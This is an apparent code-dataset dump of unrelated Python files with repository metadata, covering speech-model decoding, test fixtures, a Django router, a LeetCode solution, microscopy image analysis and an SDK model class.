def _perform_greedy(self, probs: np.ndarray):
from ctc_decoders import ctc_greedy_decoder
decoded = ctc_greedy_decoder(probs, vocabulary=self.text_featurizer.non_blank_tokens)
return tf.convert_to_tensor(decoded, dtype=tf.string)
def recognize_tflite(self, signal):
"""
Function to convert to tflite using greedy decoding
Args:
signal: tf.Tensor with shape [None] indicating a single audio signal
Return:
transcript: tf.Tensor of Unicode Code Points with shape [None] and dtype tf.int32
"""
features = self.speech_featurizer.tf_extract(signal)
features = tf.expand_dims(features, axis=0)
input_length = shape_util.shape_list(features)[1]
input_length = math_util.get_reduced_length(input_length, self.time_reduction_factor)
input_length = tf.expand_dims(input_length, axis=0)
logits = self.encoder(features, training=False)
logits = self.decoder(logits, training=False)
probs = tf.nn.softmax(logits)
decoded = tf.keras.backend.ctc_decode(
y_pred=probs, input_length=input_length, greedy=True
)
decoded = tf.cast(decoded[0][0][0], dtype=tf.int32)
transcript = self.text_featurizer.indices2upoints(decoded)
return transcript
# -------------------------------- BEAM SEARCH -------------------------------------
@tf.function
def recognize_beam(self, inputs: Dict[str, tf.Tensor], lm: bool = False):
logits = self(inputs, training=False)
probs = tf.nn.softmax(logits["logits"])
def map_fn(prob): return tf.numpy_function(self._perform_beam_search, inp=[prob, lm], Tout=tf.string)
return tf.map_fn(map_fn, probs, dtype=tf.string)
def _perform_beam_search(self, probs: np.ndarray, lm: bool = False):
from ctc_decoders import ctc_beam_search_decoder
decoded = ctc_beam_search_decoder(
probs_seq=probs,
vocabulary=self.text_featurizer.non_blank_tokens,
beam_size=self.text_featurizer.decoder_config.beam_width,
ext_scoring_func=self.text_featurizer.scorer if lm else None
)
decoded = decoded[0][-1]
return tf.convert_to_tensor(decoded, dtype=tf.string)
def recognize_beam_tflite(self, signal):
"""
Function to convert to tflite using beam search decoding
Args:
signal: tf.Tensor with shape [None] indicating a single audio signal
Return:
transcript: tf.Tensor of Unicode Code Points with shape [None] and dtype tf.int32
"""
features = self.speech_featurizer.tf_extract(signal)
features = tf.expand_dims(features, axis=0)
input_length = shape_util.shape_list(features)[1]
input_length = math_util.get_reduced_length(input_length, self.time_reduction_factor)
input_length = tf.expand_dims(input_length, axis=0)
logits = self.encoder(features, training=False)
logits = self.decoder(logits, training=False)
probs = tf.nn.softmax(logits)
decoded = tf.keras.backend.ctc_decode(
y_pred=probs, input_length=input_length, greedy=False,
beam_width=self.text_featurizer.decoder_config.beam_width
)
decoded = tf.cast(decoded[0][0][0], dtype=tf.int32)
transcript = self.text_featurizer.indices2upoints(decoded)
return transcript
# -------------------------------- TFLITE -------------------------------------
def make_tflite_function(self, greedy: bool = False):
if greedy:
return tf.function(
self.recognize_tflite,
input_signature=[
tf.TensorSpec([None], dtype=tf.float32)
]
)
return tf.function(
self.recognize_beam_tflite,
input_signature=[
tf.TensorSpec([None], dtype=tf.float32)
]
)
| [
"[email protected]"
] | |
a277d33f5860071faa32fa667b73c549508cf86b | 6d7e28fd178d5eba1b9e67dd77ad7cec6690743b | /alg_dataset.py | 0a37bab5931b6a82ad462e82449e0347cb2d479e | [] | no_license | Arseni1919/PL_TEMPLATE_PROJECT | ec83f8402996f837cbaccbea092c5cc523a959de | dd5d5fa2284c9ea1da35e316a14299fc89272669 | refs/heads/main | 2023-02-12T18:56:42.810589 | 2021-01-12T09:54:50 | 2021-01-12T09:54:50 | 326,060,903 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | from CONSTANTS import *
class ALGDataset(Dataset):
def __init__(self):
self.buffer = deque(maxlen=REPLAY_SIZE)
def __len__(self):
return len(self.buffer)
def __getitem__(self, indx):
item = self.buffer[indx]
return item.state, item.action, item.reward, item.done, item.new_state
def append(self, experience):
self.buffer.append(experience)
| [
"[email protected]"
] | |
da1c36a4a8b25e9de600154f608421c9cf4a03fb | 60eb288f242b60b872481dc1f38848c19cd51452 | /tests/conftest.py | 6dcddd7abf84dc136e6f1f1f1ff6b0879c50e873 | [
"MIT"
] | permissive | klen/muffin-admin | 62654a515f552b9026a27afc70c3e1b98cbb6f04 | 3c7c2e169911bf5388947447cfc693648decd7cb | refs/heads/develop | 2023-08-30T16:46:28.750256 | 2023-08-24T09:25:16 | 2023-08-24T09:25:16 | 34,291,282 | 19 | 2 | MIT | 2023-02-20T20:25:44 | 2015-04-20T23:04:00 | Python | UTF-8 | Python | false | false | 650 | py | from pathlib import Path
import pytest
from muffin import Application, TestClient
@pytest.fixture(
params=["trio", "curio", pytest.param(("asyncio", {"use_uvloop": False}), id="asyncio")]
)
def aiolib(request):
return request.param
@pytest.fixture(scope="session", autouse=True)
def prebuild_js():
import muffin_admin
main_js = Path(muffin_admin.__file__).parent.parent / "muffin_admin/main.js"
main_js.write_text("console.log('muffin-admin js files');")
yield main_js
main_js.unlink()
@pytest.fixture()
def app():
return Application(debug=True)
@pytest.fixture()
def client(app):
return TestClient(app)
| [
"[email protected]"
] | |
116cac7e4362884c75a97caf04c8c453116a0d80 | fb7efe44f4d9f30d623f880d0eb620f3a81f0fbd | /components/policy/tools/template_writers/writers/android_policy_writer_unittest.py | 6eb7a2f630701bdced109080db050ec1ed51ebb2 | [
"BSD-3-Clause"
] | permissive | wzyy2/chromium-browser | 2644b0daf58f8b3caee8a6c09a2b448b2dfe059c | eb905f00a0f7e141e8d6c89be8fb26192a88c4b7 | refs/heads/master | 2022-11-23T20:25:08.120045 | 2018-01-16T06:41:26 | 2018-01-16T06:41:26 | 117,618,467 | 3 | 2 | BSD-3-Clause | 2022-11-20T22:03:57 | 2018-01-16T02:09:10 | null | UTF-8 | Python | false | false | 2,684 | py | #!/usr/bin/env python
# Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for writers.android_policy_writer'''
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../..'))
import unittest
from xml.dom import minidom
from writers import writer_unittest_common
from writers import android_policy_writer
class AndroidPolicyWriterUnittest(writer_unittest_common.WriterUnittestCommon):
'''Unit tests to test assumptions in Android Policy Writer'''
def testPolicyWithoutItems(self):
# Test an example policy without items.
policy = {
'name': '_policy_name',
'caption': '_policy_caption',
'desc': 'This is a long policy caption. More than one sentence '
'in a single line because it is very important.\n'
'Second line, also important'
}
writer = android_policy_writer.GetWriter({})
writer.Init()
writer.BeginTemplate()
writer.WritePolicy(policy)
self.assertEquals(
writer._resources.toxml(),
'<resources>'
'<string name="_policy_nameTitle">_policy_caption</string>'
'<string name="_policy_nameDesc">This is a long policy caption. More '
'than one sentence in a single line because it is very '
'important.\nSecond line, also important'
'</string>'
'</resources>')
def testPolicyWithItems(self):
# Test an example policy without items.
policy = {
'name': '_policy_name',
'caption': '_policy_caption',
'desc': '_policy_desc_first.\nadditional line',
'items': [
{
'caption':'_caption1',
'value':'_value1',
},
{
'caption':'_caption2',
'value':'_value2',
}
]
}
writer = android_policy_writer.GetWriter({})
writer.Init()
writer.BeginTemplate()
writer.WritePolicy(policy)
self.assertEquals(
writer._resources.toxml(),
'<resources>'
'<string name="_policy_nameTitle">_policy_caption</string>'
'<string name="_policy_nameDesc">_policy_desc_first.\n'
'additional line</string>'
'<string-array name="_policy_nameEntries">'
'<item>_caption1</item>'
'<item>_caption2</item>'
'</string-array>'
'<string-array name="_policy_nameValues">'
'<item>_value1</item>'
'<item>_value2</item>'
'</string-array>'
'</resources>')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
e4eb19c2ffe6437ac4bd088a7d184763cd6d81a6 | 198f759dc334df0431cbc25ed4243e86b93571eb | /database_routers/mssql_router.py | d5bc32937be3d699277bc992a68a97f54e34657c | [] | no_license | miladhzz/django-muliple-db | ec2074b14dd67a547c982f20b2586f435e7e0d6c | 56ff2555e498d9105cad215daf4c3d4da59d7d9a | refs/heads/master | 2022-12-25T08:08:05.761226 | 2020-10-06T06:38:30 | 2020-10-06T06:38:30 | 301,636,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | class MssqlRouter:
route_app_labels = {'mssql',}
def db_for_read(self, model, **hints):
return 'mssql'
def db_for_write(self, model, **hints):
return 'mssql'
def allow_relation(self, obj1, obj2, **hints):
if (
obj1._meta.app_label in self.route_app_labels or
obj2._meta.app_label in self.route_app_labels
):
return True
return None
def allow_migrate(self, db, app_label, model_name=None, **hints):
"""
All non-auth models end up in this pool.
"""
return True | [
"[email protected]"
] | |
c27d90b99c370731bf6398c8f1b7c9d70f7b4c7e | d0fec74acfbfdee1b662736731c1cc988e2ba2ee | /problem_40/p040.py | 21c164577ea7c7bd2acc43fe9bacc1d482b5a2b1 | [] | no_license | msztylko/project-Euler | fdd0cfefbe88b63f6dbd2d08f1cd59270b9e1735 | b3f5ce828ccc6662c100dd27fa295fc8afa22f6e | refs/heads/master | 2021-11-23T02:50:19.333259 | 2021-10-31T17:52:28 | 2021-10-31T17:52:28 | 195,980,596 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | import sys
if sys.version_info.major == 2:
range = xrange
def compute():
s = "".join(str(i) for i in range(1, 1000000))
ans = 1
for i in range(7):
ans *= int(s[10 ** i - 1])
return str(ans)
if __name__ == "__main__":
print(compute())
| [
"[email protected]"
] | |
dc7eb6e7639c5e65a49e86d7d04a010cc48cc7de | 1d4faec6a04df7dc62f07cbb6716c660f7d0eff8 | /tests/ast_test.py | 1e483df0e4f118ac27942e63980d77826e0ebbf0 | [
"MIT"
] | permissive | QGB/QPSU | a34c8588100c30364c228d8775b3e343f38a8cb4 | 1c4fa4445c8ef3fe8d78fe295839db31dc00d6c9 | refs/heads/master | 2023-09-03T03:05:20.300569 | 2023-08-23T15:34:28 | 2023-08-23T15:34:28 | 41,740,326 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,560 | py | foo : int = 42 # <_ast.AnnAssign
dsf={'AST': (), 'Add': (), 'And': (), 'AnnAssign': ('target', 'annotation', 'value', 'simple'), 'Assert': ('test', 'msg'), 'Assign': ('targets', 'value'), 'AsyncFor': ('target', 'iter', 'body', 'orelse'), 'AsyncFunctionDef': ('name', 'args', 'body', 'decorator_list', 'returns'), 'AsyncWith': ('items', 'body'), 'Attribute': ('value', 'attr', 'ctx'), 'AugAssign': ('target', 'op', 'value'), 'AugLoad': (), 'AugStore': (), 'Await': ('value',), 'BinOp': ('left', 'op', 'right'), 'BitAnd': (), 'BitOr': (), 'BitXor': (), 'BoolOp': ('op', 'values'), 'Break': (), 'Bytes': ('s',), 'Call': ('func', 'args', 'keywords'), 'ClassDef': ('name', 'bases', 'keywords', 'body', 'decorator_list'), 'Compare': ('left', 'ops', 'comparators'), 'Constant': ('value',), 'Continue': (), 'Del': (), 'Delete': ('targets',), 'Dict': ('keys', 'values'), 'DictComp': ('key', 'value', 'generators'), 'Div': (), 'Ellipsis': (), 'Eq': (), 'ExceptHandler': ('type', 'name', 'body'), 'Expr': ('value',), 'Expression': ('body',), 'ExtSlice': ('dims',), 'FloorDiv': (), 'For': ('target', 'iter', 'body', 'orelse'), 'FormattedValue': ('value', 'conversion', 'format_spec'), 'FunctionDef': ('name', 'args', 'body', 'decorator_list', 'returns'), 'GeneratorExp': ('elt', 'generators'), 'Global': ('names',), 'Gt': (), 'GtE': (), 'If': ('test', 'body', 'orelse'), 'IfExp': ('test', 'body', 'orelse'), 'Import': ('names',), 'ImportFrom': ('module', 'names', 'level'), 'In': (), 'Index': ('value',), 'Interactive': ('body',), 'Invert': (), 'Is': (), 'IsNot': (), 'JoinedStr': ('values',), 'LShift': (), 'Lambda': ('args', 'body'), 'List': ('elts', 'ctx'), 'ListComp': ('elt', 'generators'), 'Load': (), 'Lt': (), 'LtE': (), 'MatMult': (), 'Mod': (), 'Module': ('body',), 'Mult': (), 'Name': ('id', 'ctx'), 'NameConstant': ('value',), 'Nonlocal': ('names',), 'Not': (), 'NotEq': (), 'NotIn': (), 'Num': ('n',), 'Or': (), 'Param': (), 'Pass': (), 'Pow': (), 'RShift': (), 'Raise': ('exc', 'cause'), 'Return': ('value',), 'Set': ('elts',), 'SetComp': ('elt', 'generators'), 'Slice': ('lower', 'upper', 'step'), 'Starred': ('value', 'ctx'), 'Store': (), 'Str': ('s',), 'Sub': (), 'Subscript': ('value', 'slice', 'ctx'), 'Suite': ('body',), 'Try': ('body', 'handlers', 'orelse', 'finalbody'), 'Tuple': ('elts', 'ctx'), 'UAdd': (), 'USub': (), 'UnaryOp': ('op', 'operand'), 'While': ('test', 'body', 'orelse'), 'With': ('items', 'body'), 'Yield': ('value',), 'YieldFrom': ('value',)}
import sys;'qgb.U' in sys.modules or sys.path.append('C:/QGB/babun/cygwin/bin/');from qgb import *
from _ast import AST
import ast
import json
def ast2json( node ):
if not isinstance( node, AST ):
raise TypeError( 'expected AST, got %r' % node.__class__.__name__ )
def _format( node ):
if isinstance( node, AST ):
fields = [ ( '_PyType', _format( node.__class__.__name__ ) ) ]
fields += [ ( a, _format( b ) ) for a, b in iter_fields( node ) ]
return '{ %s }' % ', '.join( ( '"%s": %s' % field for field in fields ) )
if isinstance( node, list ):
return '[ %s ]' % ', '.join( [ _format( x ) for x in node ] )
return T.json_dumps(node)
try:
return json.dumps( node )
except Exception as e:
import pdb;pdb.set_trace()
return _format( node )
def iter_fields( node ):
for field in node._fields:
try:
yield field, getattr( node, field )
except AttributeError:
pass | [
"[email protected]"
] | |
68653bc8d29f3dcdda99954fd2c56c4db08be014 | 2020c9c6958d9cc338b72f62e24d9ad30c1a8cad | /python/0048.rotate-image/rotate-image.py | ebc9d290238139686bdea8148f5026ac7910bff1 | [] | no_license | ysmintor/leetcode | b2d87db932b77e72504ffa07d7bf1b0d8c09b661 | 434889037fe3e405a8cbc71cd822eb1bda9aa606 | refs/heads/master | 2020-05-30T21:03:03.886279 | 2019-10-31T08:46:23 | 2019-10-31T09:02:24 | 189,963,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | class Solution:
def rotate(self, matrix: List[List[int]]) -> None:
"""
Do not return anything, modify matrix in-place instead.
"""
# 一共有3种处理办法,每一次都有巧妙,时间多将三个都看会
n = len(matrix)
for i in range(n):
for j in range(i+1, n):
matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]
for row in range(n):
matrix[row].reverse() | [
"[email protected]"
] | |
f8776100c8b24432acc2e97ace4ab1451f7b2dc0 | 06cabd66791a5ee15bb3ba4b04d8bc8dea5bfda0 | /2016-09-17_GranaOnIL-ZnO/Analysis.py | ab1a1fe78cc33ee40590c6130f4f2218d0b61987 | [] | no_license | claiello/python_data_analysis | f7405dfd15f0dccd2089b1878af40b9d075071d2 | 0b8d3cc5717243e72214dc24a7fc823220e13179 | refs/heads/master | 2020-04-17T20:36:51.720891 | 2017-04-23T10:00:08 | 2017-04-23T10:00:08 | 66,181,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,355 | py | import os
import sys
sys.path.append("/usr/bin") # necessary for the tex fonts
sys.path.append("../Python modules/") # necessary for the tex fonts
import scipy as sp
import scipy.misc
import matplotlib.pyplot as plt
import h5py
import numpy as np
from BackgroundCorrection import *
import matplotlib.cm as cm
import scipy.ndimage as ndimage
#from matplotlib_scalebar.scalebar import ScaleBar
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib.backends.backend_pdf import PdfPages
from MakePdf import *
from PlottingFcts import *
import warnings
warnings.simplefilter(action = "ignore", category = RuntimeWarning)
warnings.simplefilter(action = "ignore", category = DeprecationWarning)
warnings.simplefilter(action = "ignore", category = FutureWarning)
warnings.simplefilter(action = "ignore", category = PendingDeprecationWarning)
warnings.filterwarnings("ignore", category=np.VisibleDeprecationWarning)
from Registration import reg_images
from sklearn.mixture import GMM
import matplotlib.cm as cm
#import scalebars as sb
No_pixels = 250
name = ['Ib-2016-09-17-1824_ImageSequence_Grana_2.000kX_4.000kV_30mu_37',
'IIb-2016-09-17-1853_ImageSequence_Grana_2.000kX_4.000kV_30mu_44',
'III-2016-09-17-1903_ImageSequence_Grana_2.000kX_4.000kV_30mu_45',
'IVb-2016-09-17-1917_ImageSequence_Grana_2.000kX_4.000kV_30mu_49',
'V-2016-09-17-1952_ImageSequence_Grana_2.000kX_4.000kV_30mu_57',
'VI-2016-09-17-2011_ImageSequence_Grana_1.939kX_4.000kV_30mu_61',
'VII-2016-09-17-2025_ImageSequence_Grana_1.879kX_4.000kV_30mu_66'
]
Pixel_size = [5.6e-08, 5.6e-08, 5.6e-08, 5.6e-08, 5.6e-08, 5.8e-08, 5.9e-08] #as given by accompanying text file
Ps = [56,56,56,56,56,58,59]
lag = [500, 50,50,50,50,50,50]
frames = [20, 50,50,50,100,100,100]
obs = ['Region I', 'Region II','Region III (maybe anti-corr blob?)', 'Region IV', 'Region V (positive correlation)', 'Region VI (grana a bit visible in SE)', 'Region VII (grana a bit visible in SE)']
index = 4
### data
file1 = h5py.File(name[index] + '.hdf5', 'r')
se = file1['/data/Analog channel 1 : SE2/data'] #50 frames x250 x 250 pixels
red = file1['/data/Counter channel 1 : PMT red/PMT red/data']#50 frames x 200 tr pts x250 x 250 pixels
blue = file1['/data/Counter channel 2 : PMT blue/PMT blue/data']#50 frames x 200 tr pts x250 x 250 pixels
se = np.array(se)
red = np.array(red)
blue = np.array(blue)
#convert red1_dset to kHz!!!!!!!!!!!!!!!!!!!!!1
red = red/1.0e3
blue = blue/1.0e3
unit = '(kHz)'
###
se_dset = se
red_dset = red
blue_dset = blue
### register
#independently
#se_dset_reg = reg_images(se_dset)
#blue_dset_reg = reg_images(blue_dset)
#red_dset_reg = reg_images(red_dset)
#when SE fails
#blue_dset_reg, red_dset_reg = reg_images(blue_dset, red_dset)
#se_dset_reg = np.average(se_dset, axis = 0)
#based on registering of se
se_dset_reg ,blue_dset_reg, red_dset_reg = reg_images(se_dset,blue_dset, red_dset)
# CUtting if necessary
#### cut only inside window: these are the base images!!!!!!!!!!!!!!!!!!!!!!!!!!!!
##trying circular mask at center a,b
#a, b = 247,255 #y was 255 x was 243
#n = blue_dset_reg.shape[0] #not square matrix anymore; does not matter, only approximatively
#r = 160 #was 170
#y,x = np.ogrid[-a:n-a, -b:n-b]
#mask = x*x + y*y <= r*r
## cutting 3 channels
#blue_dset_cut = np.empty([blue_dset_reg.shape[0],blue_dset_reg.shape[1]])
#blue_dset_cut[:] = np.nan
#blue_dset_cut[mask] = blue_dset_reg[mask]
#
#red_dset_cut = np.empty([blue_dset_reg.shape[0],blue_dset_reg.shape[1]])
#red_dset_cut[:] = np.nan
#red_dset_cut[mask] = red_dset_reg[mask]
#
#se_dset_cut = np.empty([blue_dset_reg.shape[0],blue_dset_reg.shape[1]])
#se_dset_cut[:] = np.nan
#se_dset_cut[mask] = se_dset_reg[mask]
#not cutting
blue_dset_cut = blue_dset_reg
red_dset_cut = red_dset_reg
se_dset_cut = se_dset_reg
fig4 = plt.figure(figsize=(8, 6), dpi=80)
ax1 = plt.subplot2grid((1,3), (0, 1), colspan=1)
ax1.set_title('Blue channel base')
plt.imshow(blue_dset_cut,cmap='Blues')
ax1 = plt.subplot2grid((1,3), (0, 2), colspan=1)
ax1.set_title('Red channel base')
plt.imshow(red_dset_cut,cmap='Reds')
ax1 = plt.subplot2grid((1,3), (0, 0), colspan=1)
ax1.set_title('SE channel base')
plt.imshow(se_dset_cut,cmap='Greys')
#plt.close("all")
title = 'Grana + IL on ZnO:Ga (4kV, 30 $\mu$m, ' + str(Ps[index]) + 'nm pixels, ' + str(lag[index]) + '$\mu$s lag per pixel, ' + str(frames[index]) + 'expts., SE registered), \n' + obs[index]
scinti_channel = '$<$ 593nm'
sample_channel = '$>$ 647nm'
length_scalebar = 5000.0 #in nm (1000nm == 1mum)
scalebar_legend = '5 $\mu$m'
#plot_3_channels(se_dset_cut,blue_dset_cut, red_dset_cut, Pixel_size[index], title, scinti_channel, sample_channel, length_scalebar, scalebar_legend,unit,work_red_channel=True)
#multipage('ZZ' + name[index] + '.pdf')
#plot_3_channels_stretch(se_dset_cut,blue_dset_cut, red_dset_cut, Pixel_size[index], title, scinti_channel, sample_channel, length_scalebar, scalebar_legend,unit)
#multipage('ZZStretch' + name[index] + '.pdf')
plot_2_channels_divide(se_dset_cut,blue_dset_cut, red_dset_cut, Pixel_size[index], title, scinti_channel, sample_channel, length_scalebar, scalebar_legend,unit,work_red_channel=True)
multipage('ZZDivide' + name[index] + '.pdf')
fig40 = plt.figure(figsize=(8, 6), dpi=80)
plt.imshow(blue_dset_cut/red_dset_cut)
plt.colorbar()
plt.clim([0,200])
plt.show()
klklklk
###################################################################### OPTIONAL
want_gaussian_filter_correction_blue = False
want_gaussian_filter_correction_red = False
if want_gaussian_filter_correction_blue:
sigma_blue = 1
blue_dset_cut1 = gaussian_filter_correction(blue_dset_cut, 'Blue',sigma_blue)
blue_dset_cut = blue_dset_cut1
if want_gaussian_filter_correction_red:
sigma_red = 1
red_dset_cut1 = gaussian_filter_correction(red_dset_cut, 'Red',sigma_red)
red_dset_cut = red_dset_cut1
############################################################### END OF OPTIONAL
###################################################################### OPTIONAL
### Suggested:
# 1- Blue True, 3, [0] + Red False
# 2 - Blue True, 3, [2] + Red False
# 3 - Blue True, 3, [0] + Red True, 21, [1]
# 4 - Blue True, 3, [2] + Red True, 21, [1]
# 5 - Blue False, Red False
want_background_correction_blue = False
want_background_correction_red = False
filterset = ['white_tophat','black_tophat','medfilt']
if want_background_correction_blue:
# Available algo types:
# 'white_tophat' -> needs to change disk size
# 'black_tophat' -> needs to change disk size
# 'medfilt' -> needs to changer kernel size
# New base dsets: blue_dset_cut, red_dset_cut
size_blue = 3
blue_dset_cut1 = background_correction(blue_dset_cut, filterset[0], 'Blue',size_blue)
#blue_dset_cut2 = background_correction(blue_dset_cut, filterset[1], 'Blue',size_blue)
blue_dset_cut3 = background_correction(blue_dset_cut, filterset[2], 'Blue',size_blue)
#both [0] and [2] acceptable; min size_blue that makes sense = 3
blue_dset_cut = blue_dset_cut1 #1 or 3
if want_background_correction_red:
size_red = 21
#red_dset_cut1 = background_correction(red_dset_cut, filterset[0], 'Red',size_red)
red_dset_cut2 = background_correction(red_dset_cut, filterset[1], 'Red',size_red)
#red_dset_cut3 = background_correction(red_dset_cut, filterset[2], 'Red',size_red)
# [1] can be good. Or no correction.
red_dset_cut = red_dset_cut2
############################################################### END OF OPTIONAL
#plt.close("all")
from CreateDatasets import *
do_avg_dset = True
do_median_dset = True
do_arb_thr_one = True
do_gmmred_dset = True
do_gmmboth_dset = True
do_threshold_adaptive = True
do_random_walker = True
do_otsu = True
### construct different datasets
### 1) Simple average
if do_avg_dset:
below_blue, above_blue, below_red, above_red = above_below_avg(blue_dset_cut, red_dset_cut)
do_analysis(blue_dset_cut, red_dset_cut, below_blue, above_blue, below_red, above_red, 'YAP', 'Chlor','Above/Below avg', 'below avg', 'above avg',Pixel_size[index])
### 1) Simple median
if do_median_dset:
belowm_blue, abovem_blue, belowm_red, abovem_red = above_below_median(blue_dset_cut, red_dset_cut)
do_analysis(blue_dset_cut, red_dset_cut, belowm_blue, abovem_blue, belowm_red, abovem_red, 'YAP', 'Chlor','Above/Below median', 'below median', 'above median',Pixel_size[index])
### 1) Arb thresh in red
if do_arb_thr_one:
arb_threshold = 0.6 #fraction of max
belowarb_blue, abovearb_blue, belowarb_red, abovearb_red = arb_thr_one(red_dset_cut, blue_dset_cut, arb_threshold)
do_analysis(blue_dset_cut, red_dset_cut, belowarb_blue, abovearb_blue, belowarb_red, abovearb_red, 'YAP', 'Chlor','Above/Below arb thr = ' + str(arb_threshold) + ' of red max', 'below red thr', 'above red thr',Pixel_size[index])
### 2) GMM with red mask, where red has been recognized as fluorescence
if do_gmmred_dset:
gmmred_blue_dark_dset, gmmred_blue_bright_dset, gmmred_red_dark_dset, gmmred_red_bright_dset = gmmone(red_dset_cut, blue_dset_cut)
do_analysis(blue_dset_cut, red_dset_cut, gmmred_blue_dark_dset, gmmred_blue_bright_dset, gmmred_red_dark_dset, gmmred_red_bright_dset, 'YAP', 'Chlor','GMM red', 'red dark spots', 'red bright spots',Pixel_size[index])
### 3) GMM with independent masks in both channels
if do_gmmboth_dset:
gmmboth_blue_dark_dset, gmmboth_blue_bright_dset, gmmboth_red_dark_dset, gmmboth_red_bright_dset = gmmboth(red_dset_cut, blue_dset_cut)
do_analysis(blue_dset_cut, red_dset_cut, gmmboth_blue_dark_dset, gmmboth_blue_bright_dset, gmmboth_red_dark_dset, gmmboth_red_bright_dset, 'YAP', 'Chlor','GMM both', 'dark spots', 'bright spots',Pixel_size[index])
### 4) Threshold adapative
if do_threshold_adaptive:
blocksize = 11
offset = 0
th_below_blue, th_above_blue, th_below_red, th_above_red = threshold_adaptive_dset(red_dset_cut, blue_dset_cut,blocksize, offset)
do_analysis(blue_dset_cut, red_dset_cut, th_below_blue, th_above_blue, th_below_red, th_above_red, 'YAP', 'Chlor','Threshold adaptive' + '(blocksize, offset =' + str(blocksize) + ', ' + str(offset) + ')', 'below thr', 'above thr',Pixel_size[index])
### 5) random_walker not yet working
## http://scikit-image.org/docs/dev/auto_examples/segmentation/plot_random_walker_segmentation.html#example-segmentation-plot-random-walker-segmentation-py
if do_random_walker:
cutofflow = 0.89
cutoffhigh = 0.9
rw_below_blue, rw_above_blue, rw_below_red, rw_above_red = random_walker_dset(red_dset_cut, blue_dset_cut,cutofflow, cutoffhigh)
do_analysis(blue_dset_cut, red_dset_cut, rw_below_blue, rw_above_blue, rw_below_red, rw_above_red, 'YAP', 'Chlor','Random walker'+ '(cutoffs high, low =' + str(cutoffhigh) + ', ' + str(cutofflow) + ')', 'background', 'foreground',Pixel_size[index])
### 6) Otsu thresholding
if do_otsu:
ot_below_blue, ot_above_blue, ot_below_red, ot_above_red = thr_otsu(red_dset_cut, blue_dset_cut)
do_analysis(blue_dset_cut, red_dset_cut, ot_below_blue, ot_above_blue, ot_below_red, ot_above_red, 'YAP', 'Chlor','Otsu threshold', 'background', 'foreground',Pixel_size[index])
#print('here1')
#log_dog_doh(blue_dset_cut)
#print('here2')
#log_dog_doh(blue_dset_cut)
multipage(name[index] + '.pdf')
plt.show() | [
"[email protected]"
] | |
48050f4660f52648eea4935b898f348604a3dd8d | 82ef9a0dd1618a28770597227acfc0150b948af2 | /wearnow/gui/editors/displaytabs/notebackreflist.py | 08022d00f1eb026cafa2cb4ba841b487ad4196ea | [] | no_license | bmcage/wearnow | ef32a7848472e79e56763b38551835aa97864b21 | c8dfa75e1ea32b0c021d71c4f366ab47104c207e | refs/heads/master | 2021-01-16T00:27:59.597812 | 2016-01-19T11:55:03 | 2016-01-19T11:55:03 | 37,195,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | #
# WearNow - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# WearNow classes
#
#-------------------------------------------------------------------------
from .backrefmodel import BackRefModel
from .backreflist import BackRefList
class NoteBackRefList(BackRefList):
def __init__(self, dbstate, uistate, track, obj, callback=None):
BackRefList.__init__(self, dbstate, uistate, track, obj,
BackRefModel, callback=callback)
def get_icon_name(self):
return 'wearnow-notes'
| [
"[email protected]"
] | |
51edc73fef326593e88f5869e483e8ee2ac7edec | f72c9e46af5ce5ac738693daf65e67a0962a229a | /sdk/lusid/models/term_deposit_all_of.py | 96afcca4bb2ceee362d5973da47c3cb76093addc | [
"MIT"
] | permissive | finbourne/lusid-sdk-python | db8ce602f8408169f6583783c80ebbef83c77807 | 32fedc00ce5a37a6fe3bd9b9962570a8a9348e48 | refs/heads/master | 2023-08-29T18:22:49.488811 | 2023-08-29T15:57:26 | 2023-08-29T15:57:26 | 125,082,278 | 11 | 11 | NOASSERTION | 2023-04-28T07:16:48 | 2018-03-13T16:31:54 | Python | UTF-8 | Python | false | false | 14,288 | py | # coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 1.0.463
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid.configuration import Configuration
class TermDepositAllOf(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'start_date': 'datetime',
'maturity_date': 'datetime',
'contract_size': 'float',
'flow_convention': 'FlowConventions',
'rate': 'float',
'dom_ccy': 'str',
'instrument_type': 'str'
}
attribute_map = {
'start_date': 'startDate',
'maturity_date': 'maturityDate',
'contract_size': 'contractSize',
'flow_convention': 'flowConvention',
'rate': 'rate',
'dom_ccy': 'domCcy',
'instrument_type': 'instrumentType'
}
required_map = {
'start_date': 'required',
'maturity_date': 'required',
'contract_size': 'required',
'flow_convention': 'required',
'rate': 'required',
'dom_ccy': 'optional',
'instrument_type': 'required'
}
